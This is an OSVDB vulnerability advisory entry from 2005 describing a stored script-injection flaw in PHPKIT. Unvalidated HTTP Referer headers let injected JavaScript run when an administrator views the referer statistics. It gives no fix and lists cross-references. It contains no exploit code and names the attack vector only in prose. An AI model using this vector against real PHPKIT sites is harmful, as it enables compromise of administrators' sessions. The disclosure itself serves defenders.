PHPKIT HTTP Referer Statistics Arbitrary Script Injection

2005-11-07T11:27:18
ID OSVDB:20556
Type osvdb
Reporter Christopher Kunz(christopher.kunz@hardened-php.net)
Modified 2005-11-07T11:27:18

Description

Vulnerability Description

PHPKIT contains a flaw that may allow a remote attacker to inject arbitrary code. This flaw exists because the application does not validate user-supplied input to the 'HTTP_REFERER' header, which may allow a remote attacker to inject arbitrary Javascript code that would be executed when an administrative user views the referer statistics resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

PHPKIT contains a flaw that may allow a remote attacker to inject arbitrary code. This flaw exists because the application does not validate user-supplied input to the 'HTTP_REFERER' header, which may allow a remote attacker to inject arbitrary Javascript code that would be executed when an administrative user views the referer statistics resulting in a loss of integrity.

References:

Vendor URL: http://www.phpkit.de/ Security Tracker: 1015167 Secunia Advisory ID:17479 Related OSVDB ID: 20559 Related OSVDB ID: 20560 Related OSVDB ID: 20561 Related OSVDB ID: 20562 Related OSVDB ID: 20553 Related OSVDB ID: 20554 Related OSVDB ID: 20558 Related OSVDB ID: 20563 Related OSVDB ID: 20555 Related OSVDB ID: 20557 Other Advisory URL: http://www.hardened-php.net/advisory_212005.80.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0182.html CVE-2005-3552 Bugtraq ID: 15354